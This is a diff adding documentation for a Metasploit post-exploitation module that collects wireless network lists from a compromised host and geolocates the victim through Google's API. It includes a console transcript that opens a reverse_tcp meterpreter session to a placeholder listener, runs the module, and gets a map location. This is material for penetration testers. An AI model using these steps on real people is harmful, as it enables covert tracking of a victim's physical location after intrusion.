|
| 1 | +## Creating A Testing Environment |
| 2 | + |
| 3 | + For this module to work you need a box with a wireless adapter. The following methods are used to gather |
| 4 | + wireless information from the host: |
| 5 | + |
| 6 | + - Windows: `netsh wlan show networks mode=bssid` |
| 7 | + - OSX: `/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s` |
| 8 | + - Linux: `iwlist scanning` |
| 9 | + - Solaris: `dladm scan-wifi` |
| 10 | + - BSD: `dmesg | grep -i wlan | cut -d ':' -f1 | uniq"` |
| 11 | + |
| 12 | + If `GEOLOCATE` is set to true, Google's [GeoLocation APIs](https://developers.google.com/maps/documentation/geolocation/intro) are utilized. |
| 13 | + These APIs require a Google [API key](https://developers.google.com/maps/documentation/geolocation/get-api-key) to use them. The original |
| 14 | + methodology used by this module in [#3280](https://github.com/rapid7/metasploit-framework/pull/3280), |
| 15 | + which didn't require an API key, was found to no longer work in [#8928](https://github.com/rapid7/metasploit-framework/issues/8928). |
| 16 | + |
| 17 | +## Verification Steps |
| 18 | + |
| 19 | + 1. Start msfconsole |
| 20 | + 2. Obatin a meterpreter session via whatever method |
| 21 | + 3. Do: `use post/multi/gather/wlan_geolocate` |
| 22 | + 4. Do: `set session #` |
| 23 | + 5. Do: `set apikey [key]` |
| 24 | + 5. Do: `run` |
| 25 | + |
| 26 | +## Options |
| 27 | + |
| 28 | + **geolocate** |
| 29 | + |
| 30 | + A boolean on if wireless information should only be gathered, or the Google geolocate API should be used to geo the victim. Defaults to `false` |
| 31 | + |
| 32 | + **apikey** |
| 33 | + |
| 34 | + A string containing the Google provided geolocation api key. **REQUIRED** if `geolocate` is set to true. Defaults to empty string |
| 35 | + |
| 36 | +## Scenarios |
| 37 | + |
| 38 | +### Windows 10 |
| 39 | + |
| 40 | + resource (met_rev.rc)> use exploit/multi/handler |
| 41 | + resource (met_rev.rc)> set payload windows/meterpreter/reverse_tcp |
| 42 | + payload => windows/meterpreter/reverse_tcp |
| 43 | + resource (met_rev.rc)> setg lhost 2.2.2.2 |
| 44 | + lhost => 2.2.2.2 |
| 45 | + resource (met_rev.rc)> set lport 9876 |
| 46 | + lport => 9876 |
| 47 | + resource (met_rev.rc)> setg verbose true |
| 48 | + verbose => true |
| 49 | + resource (met_rev.rc)> exploit |
| 50 | + [*] Exploit running as background job 0. |
| 51 | + [*] Started reverse TCP handler on 2.2.2.2:9876 |
| 52 | + [*] Sending stage (179267 bytes) to 1.1.1.1 |
| 53 | + [*] Meterpreter session 1 opened (2.2.2.2:9876 -> 1.1.1.1:16111) at 2017-10-01 19:27:15 -0400 |
| 54 | + |
| 55 | + resource (met_rev.rc)> use post/multi/gather/wlan_geolocate |
| 56 | + resource (met_rev.rc)> set geolocate true |
| 57 | + geolocate => true |
| 58 | + resource (met_rev.rc)> set session 1 |
| 59 | + session => 1 |
| 60 | + resource (met_rev.rc)> set apikey ANza1yFLhaK3lreck7N3S_GYbEtJE3gGg5dJe12 |
| 61 | + apikey => ANza1yFLhaK3lreck7N3S_GYbEtJE3gGg5dJe12 |
| 62 | + msf post(wlan_geolocate) > run |
| 63 | + [+] Wireless list saved to loot. |
| 64 | + [*] Google indicates the device is within 30.0 meters of 30.3861197,-97.7385878. |
| 65 | + [*] Google Maps URL: https://maps.google.com/?q=30.3861197,-97.7385878 |
| 66 | + [*] Post module execution completed |
0 commit comments